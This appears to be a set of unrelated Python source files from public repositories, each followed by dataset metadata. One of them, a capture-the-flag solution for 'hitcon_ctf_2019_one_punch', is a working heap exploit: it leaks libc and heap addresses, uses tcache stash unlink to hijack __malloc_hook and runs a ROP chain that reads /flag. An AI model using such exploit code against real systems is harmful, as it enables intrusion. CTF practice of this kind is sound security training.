contact capacity_new = ((node.to_time - distance) * node.datarate) # Update capacity if smaller if capacity_new < capacity: capacity = capacity_new # The to_time of a route is the minimum end time of a contact within this # route (minus the assumed signal propagation delay, in the rr considered # to be neglegible) to_time = min([node.to_time for node in route]) # Return the characteristics tuple consisting of the route distance (i.e. 
# the arrival time), the route capacity and the route availability end # time (i.e. the to-time) return (distance, capacity, to_time)
42.268519
79
0.660241
611
4,565
4.847791
0.289689
0.020257
0.016205
0.011479
0.01688
0
0
0
0
0
0
0.001225
0.284556
4,565
107
80
42.663551
0.905695
0.645126
0
0
0
0
0
0
0
0
0
0
0
1
0.074074
false
0
0.037037
0
0.185185
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc04f43fced1ed2108de24776b9c054870c3a6d
785
py
Python
rxbp/multicast/multicastobservers/mapmulticastobserver.py
MichaelSchneeberger/rx_backpressure
16173827498bf1bbee3344933cb9efbfd19699f5
[ "Apache-2.0" ]
24
2018-11-22T21:04:49.000Z
2021-11-08T11:18:09.000Z
rxbp/multicast/multicastobservers/mapmulticastobserver.py
MichaelSchneeberger/rx_backpressure
16173827498bf1bbee3344933cb9efbfd19699f5
[ "Apache-2.0" ]
1
2019-02-06T15:58:46.000Z
2019-02-12T20:31:50.000Z
rxbp/multicast/multicastobservers/mapmulticastobserver.py
MichaelSchneeberger/rx_backpressure
16173827498bf1bbee3344933cb9efbfd19699f5
[ "Apache-2.0" ]
1
2021-01-26T12:41:37.000Z
2021-01-26T12:41:37.000Z
from dataclasses import dataclass from typing import Callable from rxbp.multicast.multicastobserver import MultiCastObserver from rxbp.multicast.typing import MultiCastItem @dataclass class MapMultiCastObserver(MultiCastObserver): source: MultiCastObserver func: Callable[[MultiCastItem], MultiCastItem] def on_next(self, item: MultiCastItem) -> None: try: def map_gen(): for v in item: yield self.func(v) next = map_gen() except Exception as exc: self.source.on_error(exc) else: self.source.on_next(next) def on_error(self, exc: Exception) -> None: self.source.on_error(exc) def on_completed(self) -> None: self.source.on_completed()
27.068966
62
0.650955
88
785
5.704545
0.386364
0.079681
0.095618
0.067729
0.079681
0
0
0
0
0
0
0
0.26879
785
29
63
27.068966
0.874564
0
0
0.090909
0
0
0
0
0
0
0
0
0
1
0.181818
false
0
0.181818
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc1c2924b490c44031d1301da774e5f85923904
112
py
Python
Unit 5/5.2/5.2.8 Average Test Score.py
shashwat73/cse
60e49307e57105cf9916c7329f53f891c5e81fdb
[ "MIT" ]
1
2021-04-08T14:02:49.000Z
2021-04-08T14:02:49.000Z
Unit 5/5.2/5.2.8 Average Test Score.py
shashwat73/cse
60e49307e57105cf9916c7329f53f891c5e81fdb
[ "MIT" ]
null
null
null
Unit 5/5.2/5.2.8 Average Test Score.py
shashwat73/cse
60e49307e57105cf9916c7329f53f891c5e81fdb
[ "MIT" ]
null
null
null
Score = 0 for For3Scores in range(1,4): Average = int(input()) Score += Average print((Score/3))
12.444444
30
0.589286
16
112
4.125
0.8125
0
0
0
0
0
0
0
0
0
0
0.060241
0.258929
112
8
31
14
0.73494
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bdc3d024640dd15b38deac97c8ed950cc5cf3909
415
py
Python
main/rsa_encryption/settings.py
Risoko/RSA-Encryption
1bea1ef3a7609541578d784b7315c73e1e6a481b
[ "MIT" ]
null
null
null
main/rsa_encryption/settings.py
Risoko/RSA-Encryption
1bea1ef3a7609541578d784b7315c73e1e6a481b
[ "MIT" ]
null
null
null
main/rsa_encryption/settings.py
Risoko/RSA-Encryption
1bea1ef3a7609541578d784b7315c73e1e6a481b
[ "MIT" ]
null
null
null
from decouple import config RANGE_OF_PRIME_NUMBERS = { "min": 10, "max": 190 } DATABASE = { 'type': config("TYPE"), 'user': config("USER"), 'password': config("PASSWORD"), 'localhost': config("LOCALHOST"), 'database_name': config("DATABASE_NAME") } PATH_FOR_PUBLIC_KEY = "/home/risoko/Pulpit/public_key" KEYS_EXPIRE = { "DAYS": 0, "MINUTES": 10, "SECONDS": 0 }
18.863636
54
0.6
47
415
5.085106
0.659574
0.100418
0
0
0
0
0
0
0
0
0
0.02795
0.224096
415
22
55
18.863636
0.714286
0
0
0
0
0
0.3125
0.072115
0
0
0
0
0
1
0
false
0.055556
0.055556
0
0.055556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
bdc402ae42475915911f7485b03af5085a350424
2,413
py
Python
clean-up-pdf.py
spider-walker/reading-pdf-files-mongo
3a7b5346bd8e5bedfba388ea9a0053cd8330d332
[ "Apache-2.0" ]
null
null
null
clean-up-pdf.py
spider-walker/reading-pdf-files-mongo
3a7b5346bd8e5bedfba388ea9a0053cd8330d332
[ "Apache-2.0" ]
null
null
null
clean-up-pdf.py
spider-walker/reading-pdf-files-mongo
3a7b5346bd8e5bedfba388ea9a0053cd8330d332
[ "Apache-2.0" ]
null
null
null
with open('./data/data2017.txt') as f: lines = f.readlines() for ln in lines: ln = ln.replace(',', '').replace(':', '').replace('int64', '') \ .replace('Name', '').replace('dtype', '').replace('/', ' ') \ .replace('object', '').replace('float64', ' ') \ .replace('NaN', '').replace('NaN', ' ') \ .replace('.', ' ') text = ln.split() if text[0].isnumeric(): text.pop(0) if text[0].isnumeric(): text.pop(0) if text[0].isnumeric(): text.pop(0) if not text[1].isnumeric(): text[0] = f'{text[0]} {text[1]}' text.pop(1) if not text[2].isnumeric(): text.insert(2, '0') text.insert(3, '0') if not text[1].isnumeric(): text[0] = f'{text[0]} {text[1]}' text.pop(1) if len(text) > 6 and not text[5].isnumeric(): text[4] = f'{text[4]} {text[5]}' text.pop(5) if len(text) > 6 and not text[5].isnumeric(): text[4] = f'{text[4]} {text[5]}' text.pop(5) if len(text) > 7 and not text[6].isnumeric(): text.insert(6, '0') text.insert(7, '0') if len(text) > 9 and not text[9].isnumeric(): text[8] = f'{text[8]} {text[9]}' text.pop(9) if len(text) > 9 and not text[9].isnumeric(): text[8] = f'{text[8]} {text[9]}' text.pop(9) if len(text) > 9 and not text[9].isnumeric(): text[8] = f'{text[8]} {text[9]}' text.pop(9) if len(text) > 7 and not text[7].isnumeric(): text.insert(7, '0') text.insert(9, '0') if len(text) == 10: text.insert(9, '0') if len(text) == 10: text.insert(9, '0') if len(text) == 11 and text[9].isnumeric() and int(text[9].strip())>100: text.insert(9, '0') if len(text) == 7: text.insert(1, '0') text.insert(3, '0') text.insert(6, '0') text.insert(7, '0') text.insert(9, '0') notwanted = ['-------------------------------', 'CONSTITUENCY_NAME', 'GRAND TOTAL', 'CAW'] if not set(text) & set(notwanted): text.insert(0, f'{len(text)}') s = ','.join(text) print(f' {s}')
30.544304
98
0.426855
312
2,413
3.298077
0.166667
0.145773
0.09621
0.048591
0.637512
0.613217
0.613217
0.571429
0.501458
0.501458
0
0.064267
0.35516
2,413
78
99
30.935897
0.597044
0
0
0.66129
0
0
0.11811
0.012847
0
0
0
0
0
1
0
false
0
0
0
0
0.016129
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc63bfed4044eff802e2301570d6c7de4fbc7e5
1,423
py
Python
cv_workshops/7-day/9-clazz.py
afterloe/opencv-practice
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
[ "MIT" ]
5
2020-03-13T07:34:30.000Z
2021-10-01T03:03:05.000Z
cv_workshops/7-day/9-clazz.py
afterloe/Opencv-practice
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
[ "MIT" ]
null
null
null
cv_workshops/7-day/9-clazz.py
afterloe/Opencv-practice
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
[ "MIT" ]
1
2020-03-01T12:35:02.000Z
2020-03-01T12:35:02.000Z
#!/usr/bin/env python3 # -*- coding=utf-8 -*- import cv2 as cv """ 形态学分析应用 - 使用基本梯度对轮廓进行分析处理 使用形态学的二值化处理,对是别内容进行轮廓分析,在OCR上是其处理的手段之一,相比于threshold的二值化而言,对图像会有更好的分割效 果,技术路线如下: 1 图像形态学梯度 2 灰度 3 全局阈值二值化 4 轮廓分析 """ def main(): src = cv.imread("../../pic/1.jpg") blur = cv.medianBlur(src, 3) kernel = cv.getStructuringElement(cv.MORPH_RECT, (3, 3)) gradient = cv.morphologyEx(blur, cv.MORPH_GRADIENT, kernel) cv.imshow("gradient", gradient) gray = cv.cvtColor(gradient, cv.COLOR_BGR2GRAY) _, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU) cv.imshow("binary", binary) # binary = cv.morphologyEx(binary, cv.MORPH_DILATE, cv.getStructuringElement(cv.MORPH_CROSS, (3, 3))) # 膨胀 3*3 十字交叉 contours, _ = cv.findContours(binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE) if 0 == len(contours): print("未搜寻到结果") return for index in range(len(contours)): contour = contours[index] x, y, w, h = cv.boundingRect(contour) # 获取最大外接矩形 area = cv.contourArea(contour) # 获取轮廓面积 if not 10 < area < 500 or not 10 < h < 60: continue cv.rectangle(src, (x, y), (x + w, y + h), (0, 0, 255), 2, cv.LINE_8) cv.imshow("src", src) cv.waitKey(0) cv.destroyAllWindows() if "__main__" == __name__: main()
31.622222
121
0.598032
182
1,423
4.56044
0.516484
0.048193
0.060241
0.072289
0
0
0
0
0
0
0
0.036294
0.264231
1,423
44
122
32.340909
0.756447
0.120871
0
0
0
0
0.045635
0
0
0
0
0
0
1
0.038462
false
0
0.038462
0
0.115385
0.038462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc6adac6ca6afd61c4934fbf7cff6d47b19bb9a
1,118
py
Python
vaccibot/__main__.py
fsoubelet/vaccibot
f0956ddbf9f0ac712d3e6e10d9fb5f3edb3dda11
[ "MIT" ]
null
null
null
vaccibot/__main__.py
fsoubelet/vaccibot
f0956ddbf9f0ac712d3e6e10d9fb5f3edb3dda11
[ "MIT" ]
null
null
null
vaccibot/__main__.py
fsoubelet/vaccibot
f0956ddbf9f0ac712d3e6e10d9fb5f3edb3dda11
[ "MIT" ]
null
null
null
import sys from loguru import logger from rich.console import Console, RenderGroup from rich.panel import Panel from vaccibot.constants import LOGURU_FORMAT from vaccibot.parsing import ARGS from vaccibot.process import retrieve_all_suitable_appointments from vaccibot.render import make_department_table logger.remove() logger.add(sys.stdout, level=f"{ARGS.logs.upper()}", format=LOGURU_FORMAT) @logger.catch() def main() -> None: """Parses arguments from the commandline, fetches data and renders it in the terminal.""" console = Console() panels = [] suitable_appointments: dict = retrieve_all_suitable_appointments() for department, appointments in suitable_appointments.items(): if appointments: # do not make a panel and table if no appointments found panels.append( Panel( make_department_table(appointments), title=department, expand=True, border_style="scope.border", ) ) console.print(*panels) if __name__ == "__main__": main()
30.216216
93
0.674419
127
1,118
5.755906
0.503937
0.065663
0.051984
0.084815
0
0
0
0
0
0
0
0
0.246869
1,118
36
94
31.055556
0.868171
0.124329
0
0
0
0
0.040082
0
0
0
0
0
0
1
0.035714
false
0
0.285714
0
0.321429
0.035714
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc6c6cba8f42afd0b986c47d1d40853cdff8c8c
4,618
py
Python
buuctf/107-hitcon_ctf_2019_one_punch/exp.py
RoderickChan/ctf_tasks
a021c6d86cade26448d099933f3caa856ed28360
[ "MIT" ]
null
null
null
buuctf/107-hitcon_ctf_2019_one_punch/exp.py
RoderickChan/ctf_tasks
a021c6d86cade26448d099933f3caa856ed28360
[ "MIT" ]
null
null
null
buuctf/107-hitcon_ctf_2019_one_punch/exp.py
RoderickChan/ctf_tasks
a021c6d86cade26448d099933f3caa856ed28360
[ "MIT" ]
null
null
null
from pwncli import * cli_script() p:tube = gift['io'] elf:ELF = gift['elf'] libc: ELF = gift['libc'] pop_rdi_ret = 0x26542 pop_rsi_ret = 0x26f9e pop_rdx_ret = 0x12bda6 pop_rax_ret = 0x47cf8 syscall_ret = 0xcf6c5 def debut(idx, size, name="a"): if isinstance(name, str): pad = "a" else: pad = b"a" name = name.ljust(size, pad) p.sendlineafter("> ", "1") p.sendlineafter("idx: ", str(idx)) p.sendafter("hero name: ", name) def rename(idx, name): p.sendlineafter("> ", "2") p.sendlineafter("idx: ", str(idx)) p.sendafter("hero name: ", name) def show(idx): p.sendlineafter("> ", "3") p.sendlineafter("idx: ", str(idx)) p.recvuntil("hero name: ") return u64(p.recvline()[:-1].ljust(8, b"\x00")) def retire(idx): p.sendlineafter("> ", "4") p.sendlineafter("idx: ", str(idx)) def punch(data): p.sendlineafter("> ", "50056") p.send(data) p.recvuntil("Serious Punch!!!\n") # use tcachebin stach unlink, while has 5, to malloc at any address def attack1(): debut(0, 0x400) retire(0) debut(1, 0x400) retire(1) heap_base_addr = show(1) - 0x260 log_address("heap_base_addr", heap_base_addr) for i in range(5): debut(0, 0x400) retire(0) debut(0, 0x400) for i in range(5): debut(1, 0x210) retire(1) retire(0) libc_base_addr = show(0) - 0x1e4ca0 libc.address = libc_base_addr log_address("libc_base_addr", libc_base_addr) # split chunk debut(1, 0x1e0) # get smallbin chunk debut(1, 0x400) payload = flat({ 0: [0, 0x221, heap_base_addr + 0x20b0, libc_base_addr + 0x1e4bf8], 0x1e0: [0, 0x221, 0xdeadbeef, heap_base_addr + 0x1ed0] }, filler="\x00") rename(0, payload) # to trigger tcache stash unlink debut(1, 0x210) # to change __malloc_hook payload = flat({ 0x20: "/flag\x00\x00\x00", 0x28: libc_base_addr + 0x99540 }) punch(payload) layout = [ libc_base_addr + pop_rdi_ret, # rdi libc.sym["__malloc_hook"] - 8, libc_base_addr + pop_rsi_ret, # rsi 0, libc_base_addr + pop_rax_ret, # rax 2, # open("/flag", 0) libc_base_addr + syscall_ret, # syscall libc_base_addr + pop_rdi_ret, 3, libc_base_addr + pop_rsi_ret, 
heap_base_addr + 0x400, libc_base_addr + pop_rdx_ret, 0x30, libc_base_addr + pop_rax_ret, 0, # read libc_base_addr + syscall_ret, libc_base_addr + pop_rdi_ret, 1, libc_base_addr + pop_rax_ret, 1, libc_base_addr + syscall_ret ] debut(1, 0x300, flat(layout)) p.interactive() # use tcachebin stach unlink, while has 6, to write heap address at any address def attack2(): debut(0, 0x400) retire(0) debut(1, 0x400) retire(1) heap_base_addr = show(1) - 0x260 log_address("heap_base_addr", heap_base_addr) for i in range(5): debut(0, 0x400) retire(0) debut(0, 0x400) for i in range(6): debut(1, 0x2f0) retire(1) debut(2, 0x210) retire(2) # stop() retire(0) libc_base_addr = show(0) - 0x1e4ca0 libc.address = libc_base_addr log_address("libc_base_addr", libc_base_addr) # split chunk debut(1, 0x100) # get smallbin chunk debut(1, 0x400) payload = flat({ 0: [0, 0x301, heap_base_addr + 0x1fd0, heap_base_addr + 0x20 - 5], 0x100: [0, 0x301, 0xdeadbeef, heap_base_addr + 0x1ed0] }, filler="\x00") rename(0, payload) # to trigger tcache stash unlink debut(1, 0x2f0) stop() rename(2, p64(libc.sym['__malloc_hook']-8)) punch("a" * 0x60) punch(b"/flag\x00\x00\x00" + p64(libc_base_addr + 0x8cfd6)) # add rsp 0x48; ret layout = [ libc_base_addr + pop_rdi_ret, # rdi libc.sym["__malloc_hook"] - 8, libc_base_addr + pop_rsi_ret, # rsi 0, libc_base_addr + pop_rax_ret, # rax 2, # open("/flag", 0) libc_base_addr + syscall_ret, # syscall libc_base_addr + pop_rdi_ret, 3, libc_base_addr + pop_rsi_ret, heap_base_addr + 0x400, libc_base_addr + pop_rdx_ret, 0x30, libc_base_addr + pop_rax_ret, 0, # read libc_base_addr + syscall_ret, libc_base_addr + pop_rdi_ret, 1, libc_base_addr + pop_rax_ret, 1, libc_base_addr + syscall_ret ] debut(1, 0x300, flat(layout)) p.interactive() attack2()
22.637255
83
0.586618
647
4,618
3.933539
0.196291
0.150884
0.165029
0.10609
0.671513
0.655403
0.619253
0.619253
0.619253
0.619253
0
0.089829
0.28887
4,618
204
84
22.637255
0.68514
0.086618
0
0.657718
0
0
0.058164
0
0
0
0.068415
0
0
1
0.04698
false
0
0.006711
0
0.060403
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bdc856fc9ff913efd9003763250b43ae605b0ec6
1,277
py
Python
pi4home/components/text_sensor/custom.py
khzd/pi4home
937bcdcf77bab111cca10af1fe45c63a55c29aae
[ "MIT" ]
1
2019-05-16T02:52:12.000Z
2019-05-16T02:52:12.000Z
pi4home/components/text_sensor/custom.py
khzd/pi4home
937bcdcf77bab111cca10af1fe45c63a55c29aae
[ "MIT" ]
null
null
null
pi4home/components/text_sensor/custom.py
khzd/pi4home
937bcdcf77bab111cca10af1fe45c63a55c29aae
[ "MIT" ]
null
null
null
import voluptuous as vol from pi4home.components import text_sensor import pi4home.config_validation as cv from pi4home.const import CONF_ID, CONF_LAMBDA, CONF_NAME, CONF_TEXT_SENSORS from pi4home.cpp_generator import add, process_lambda, variable from pi4home.cpp_types import std_vector CustomTextSensorConstructor = text_sensor.text_sensor_ns.class_('CustomTextSensorConstructor') PLATFORM_SCHEMA = text_sensor.PLATFORM_SCHEMA.extend({ cv.GenerateID(): cv.declare_variable_id(CustomTextSensorConstructor), vol.Required(CONF_LAMBDA): cv.lambda_, vol.Required(CONF_TEXT_SENSORS): cv.ensure_list(text_sensor.TEXT_SENSOR_SCHEMA.extend({ cv.GenerateID(): cv.declare_variable_id(text_sensor.TextSensor), })), }) def to_code(config): for template_ in process_lambda(config[CONF_LAMBDA], [], return_type=std_vector.template(text_sensor.TextSensorPtr)): yield rhs = CustomTextSensorConstructor(template_) custom = variable(config[CONF_ID], rhs) for i, conf in enumerate(config[CONF_TEXT_SENSORS]): rhs = custom.Pget_text_sensor(i) add(rhs.set_name(conf[CONF_NAME])) text_sensor.register_text_sensor(rhs, conf) BUILD_FLAGS = '-DUSE_CUSTOM_TEXT_SENSOR'
36.485714
96
0.750196
161
1,277
5.621118
0.360248
0.132597
0.049724
0.044199
0.095028
0.095028
0.095028
0.095028
0
0
0
0.004673
0.162099
1,277
34
97
37.558824
0.841122
0
0
0
0
0
0.039937
0.039937
0
0
0
0
0
1
0.038462
false
0
0.230769
0
0.269231
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc8d13384d848da3326a2122e88d0a41453ccdd
4,589
py
Python
rolling_measures/rolling_measures/__init__.py
marketler/GFW_vessel_scoring
16a141e78258dcc9bab458d5ebd8fad6d2721816
[ "Apache-2.0" ]
null
null
null
rolling_measures/rolling_measures/__init__.py
marketler/GFW_vessel_scoring
16a141e78258dcc9bab458d5ebd8fad6d2721816
[ "Apache-2.0" ]
null
null
null
rolling_measures/rolling_measures/__init__.py
marketler/GFW_vessel_scoring
16a141e78258dcc9bab458d5ebd8fad6d2721816
[ "Apache-2.0" ]
null
null
null
import math import operator import six class NegativePopulationSize(ValueError): def __init__(self, typename): self.typename = typename ValueError.__init__(self) def __str__(self): return str(str(self)) def __unicode__(self): return "More calls to %(type)s.remove() than to %(type)s.add()" % {"type": self.typename} class NonPositivePopulationSize(ValueError): def __init__(self, typename): self.typename = typename ValueError.__init__(self) def __str__(self): return str(str(self)) def __unicode__(self): return "Need more calls to %(type)s.add() than to %(type)s.remove()" % {"type": self.typename} class AbstractStdDev(object): def get(self): return math.sqrt(self.getSqr()) def __add__(self, other): return StdDevSum(self.getSqr() + other.getSqr()) class StdDevSum(AbstractStdDev): def __init__(self, sqr): self.sqr = sqr def getSqr(self): return self.sqr class StdDev(AbstractStdDev): def __init__(self): self.count = 0 self.sum = 0 self.sqrsum = 0 def add(self, value): self.count += 1 self.sum += value self.sqrsum += value**2 def remove(self, value): if self.count < 1: raise NonPositivePopulationSize("StdDev") self.count -= 1 self.sum -= value self.sqrsum -= value**2 def getSqr(self): if self.count < 1: raise NonPositivePopulationSize("StdDev") a = self.sqrsum/self.count b = (self.sum/self.count)**2 # Handle rounding errors # FIXME: find out what values this happened for and make a test... 
if a < b: # pragma: no cover assert b - a < 1e-3 return 0.0 return a - b class Avg(object): def __init__(self): self.count = 0 self.sum = 0 def add(self, value): self.count += 1 self.sum += value def remove(self, value): if self.count <= 1: raise NonPositivePopulationSize("Avg") self.count -= 1 self.sum -= value def get(self): if self.count < 1: raise NonPositivePopulationSize("Avg") return self.sum/self.count class Sum(object): def __init__(self): self.count = 0 self.sum = 0 def add(self, value): self.count += 1 self.sum += value def remove(self, value): if self.count <= 0: raise NegativePopulationSize("Sum") self.count -= 1 self.sum -= value def get(self): return self.sum class Count(object): def __init__(self): self.count = 0 def add(self, value): self.count += 1 def remove(self, value): # Fast failure if self.count <= 0: raise NegativePopulationSize("Sum") self.count -= 1 def get(self): return self.count class Stat(object): def __init__(self, source, cls): self.source = source self.value = cls() def add(self, value): if self.source in value: self.value.add(value[self.source]) def remove(self, value): if self.source in value: self.value.remove(value[self.source]) def get(self): return self.value.get() class StatSum(object): def __init__(self, *stats): self.stats = stats def add(self, value): for stat in self.stats: stat.add(value) def remove(self, value): for stat in self.stats: stat.remove(value) def get(self): summed = self.stats[0].value for x in self.stats[1:]: summed = summed + x.value return summed.get() # return reduce(operator.add, [stat.value for stat in self.stats]).get() class Stats(object): """ stat = Stats({ "latitude": Stat("latitude", Avg), "longitude": Stat("longitude", Avg), "sigma": StatSum(Stat("latitude", StdDev), Stat("longitude", StdDev))}) stat.add({'latitude': 4.3, 'longitude': 3.2}) print stat.get()['sigma'] """ def __init__(self, fieldmap): self.fieldmap = fieldmap def add(self, value): for field in six.itervalues(self.fieldmap): 
field.add(value) def remove(self, value): for field in six.itervalues(self.fieldmap): field.remove(value) def get(self): return { key: value.get() for (key, value) in six.iteritems(self.fieldmap)}
28.503106
102
0.568098
561
4,589
4.525847
0.153298
0.077983
0.047263
0.041355
0.54746
0.491532
0.478929
0.413549
0.378889
0.317054
0
0.011055
0.310089
4,589
160
103
28.68125
0.790903
0.098714
0
0.574627
0
0
0.035435
0
0
0
0
0.00625
0.007463
1
0.283582
false
0
0.022388
0.08209
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
bdcbad672362d3c6fe25962d2ca5b1424db44011
1,186
py
Python
lib/python2.7/site-packages/braintree/transparent_redirect.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
3
2015-11-05T08:57:12.000Z
2016-07-17T18:10:55.000Z
lib/python2.7/site-packages/braintree/transparent_redirect.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
13
2020-03-24T17:53:51.000Z
2022-02-10T20:01:14.000Z
lib/python2.7/site-packages/braintree/transparent_redirect.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
2
2019-04-29T14:16:10.000Z
2020-07-23T12:04:17.000Z
import braintree from braintree.configuration import Configuration class TransparentRedirect: """ A class used for Transparent Redirect operations """ class Kind(object): CreateCustomer = "create_customer" UpdateCustomer = "update_customer" CreatePaymentMethod = "create_payment_method" UpdatePaymentMethod = "update_payment_method" CreateTransaction = "create_transaction" @staticmethod def confirm(query_string): """ Confirms a transparent redirect request. It expects the query string from the redirect request. The query string should _not_ include the leading "?" character. :: result = braintree.TransparentRedirect.confirm("foo=bar&id=12345") """ return Configuration.gateway().transparent_redirect.confirm(query_string) @staticmethod def tr_data(data, redirect_url): return Configuration.gateway().transparent_redirect.tr_data(data, redirect_url) @staticmethod def url(): """ Returns the url for POSTing Transparent Redirect HTML forms """ return Configuration.gateway().transparent_redirect.url()
31.210526
93
0.693929
115
1,186
7
0.469565
0.141615
0.096894
0.137888
0.219876
0
0
0
0
0
0
0.00547
0.229342
1,186
37
94
32.054054
0.875274
0.290051
0
0.166667
0
0
0.117955
0.055046
0
0
0
0
0
1
0.166667
false
0
0.111111
0.055556
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
bdcc6ad7468791c7a47fc038f3016e03c535f1fc
197
py
Python
fluentogram/src/abc/__init__.py
Arustinal/fluentogram
c3d7b307b40d520ef1db5e2a0945f3d7fe269b78
[ "MIT" ]
null
null
null
fluentogram/src/abc/__init__.py
Arustinal/fluentogram
c3d7b307b40d520ef1db5e2a0945f3d7fe269b78
[ "MIT" ]
null
null
null
fluentogram/src/abc/__init__.py
Arustinal/fluentogram
c3d7b307b40d520ef1db5e2a0945f3d7fe269b78
[ "MIT" ]
null
null
null
# coding=utf-8 from .misc import AbstractAttribTracer from .transformer import AbstractDataTransformer from .translator import AbstractTranslator from .translator_hub import AbstractTranslatorsHub
32.833333
50
0.873096
20
197
8.55
0.65
0.163743
0
0
0
0
0
0
0
0
0
0.005587
0.091371
197
5
51
39.4
0.949721
0.060914
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
5
bdcc6e536cb58033fe61c7df47d8e2e7c55ae4c2
1,902
py
Python
awsume/autoawsume/process.py
ignatenkobrain/awsume
8191c35e8d60495e608c77801698c0a1a332d76f
[ "MIT" ]
654
2016-04-05T16:51:22.000Z
2022-03-28T21:07:30.000Z
awsume/autoawsume/process.py
ignatenkobrain/awsume
8191c35e8d60495e608c77801698c0a1a332d76f
[ "MIT" ]
149
2016-12-01T17:30:58.000Z
2022-03-29T23:49:50.000Z
awsume/autoawsume/process.py
ignatenkobrain/awsume
8191c35e8d60495e608c77801698c0a1a332d76f
[ "MIT" ]
90
2016-04-12T00:50:04.000Z
2022-03-30T20:44:45.000Z
import argparse import psutil from ..awsumepy.lib.aws_files import delete_section, get_aws_files, read_aws_file from ..awsumepy.lib.logger import logger def kill_autoawsume(): logger.debug('Killing autoawsume') for proc in psutil.process_iter(): try: for command_string in proc.cmdline(): if 'autoawsume' in command_string: proc.kill() except Exception: pass def kill(arguments: argparse.Namespace): _, credentials_file = get_aws_files(None, None) if arguments.profile_name: logger.debug('Stoping auto-refresh of profile {}'.format(arguments.profile_name)) profiles = read_aws_file(credentials_file) if 'autoawsume-{}'.format(arguments.profile_name) in profiles: delete_section('autoawsume-{}'.format(arguments.profile_name), credentials_file) profiles.pop('autoawsume-{}'.format(arguments.profile_name)) if arguments.profile_name in profiles and profiles[arguments.profile_name].get('autoawsume'): delete_section(arguments.profile_name, credentials_file) profiles.pop(arguments.profile_name) autoawsume_profiles = [{k: v} for k, v in profiles.items() if v.get('autoawsume')] if any(autoawsume_profiles): print('Stop {}'.format(arguments.profile_name)) return else: logger.debug('There were not more autoawsume profiles, stopping autoawsume') print('Kill') kill_autoawsume() else: logger.debug('Stopping all auto refreshing and removing autoawsume profiles') kill_autoawsume() profiles = read_aws_file(credentials_file) for profile in profiles: if 'autoawsume-' in profile or profiles[profile].get('autoawsume'): delete_section(profile, credentials_file) print('Kill')
41.347826
101
0.664038
215
1,902
5.688372
0.293023
0.130826
0.163532
0.106296
0.235487
0.130826
0.075225
0
0
0
0
0
0.239222
1,902
45
102
42.266667
0.845197
0
0
0.2
0
0
0.146162
0
0
0
0
0
0
1
0.05
false
0.025
0.1
0
0.175
0.075
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdcd63c3f87c9cdba74f8e75512a7d40eef94fd9
8,787
py
Python
engine/sprite.py
amirgeva/retroupy
1ee19b36a72c5f592cce150d1d0382a00ccdc4a0
[ "BSD-3-Clause" ]
null
null
null
engine/sprite.py
amirgeva/retroupy
1ee19b36a72c5f592cce150d1d0382a00ccdc4a0
[ "BSD-3-Clause" ]
null
null
null
engine/sprite.py
amirgeva/retroupy
1ee19b36a72c5f592cce150d1d0382a00ccdc4a0
[ "BSD-3-Clause" ]
null
null
null
import json
import os
import gc
from .app import get_screen
from .utils import Rect
from .bitmatrix import BitMatrix


class SpritesManager:
    """Allocates hardware sprite slots (ids 0..limit-1), recycling freed ids."""

    def __init__(self):
        self.free_indices = []  # ids returned for reuse
        self.last_used = -1     # highest id ever handed out
        self.limit = 160        # maximum number of sprite slots

    def clear(self):
        """Forget all allocations (does not touch the screen's sprite table)."""
        self.free_indices = []
        self.last_used = -1

    def allocate(self, data):
        """Upload sprite pixel data to the screen and return its slot id.

        Returns -1 when all slots are in use.
        """
        if len(self.free_indices) > 0:
            sprite_id = self.free_indices.pop()
        else:
            sprite_id = self.last_used + 1
            if sprite_id >= self.limit:
                return -1
            self.last_used = sprite_id
